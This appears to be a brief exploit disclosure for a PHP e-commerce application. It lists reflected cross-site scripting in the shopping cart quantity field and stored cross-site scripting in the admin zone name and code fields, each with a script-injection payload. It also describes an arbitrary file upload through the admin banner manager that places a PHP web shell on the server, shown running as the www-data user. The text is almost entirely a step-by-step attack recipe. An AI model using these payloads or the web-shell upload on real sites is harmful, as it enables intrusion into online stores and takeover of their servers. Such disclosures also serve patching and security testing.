REFLECTED CROSS-SITE SCRIPTING (XSS)

http://[host]/index.php?main_page=shopping_cart (OR)
 
   Your Shopping Cart Contents =>
 
   Qty: "><script>alert("XSS")</script>
 
STORED CROSS-SITE SCRIPTING (XSS)

http://[host]/[admin]/zones.php?page=1&action=new (OR)
 
   Locations/Taxes => Zones
    
   Zones Name: "><script>alert("XSS")</script>
   Zones Code: "><script>alert("XSS")</script>

ARBITRARY FILE UPLOAD

http://[host]/[admin]/banner_manager.php?action=new (OR)
 
   Tools => Banner Manager => New Banner => Image: phpShell.php
 
   The uploaded file will be located into:
 
    http://[host]/images/phpShell.php
 
    uid=33(www-data) gid=33(www-data) groups=33(www-data)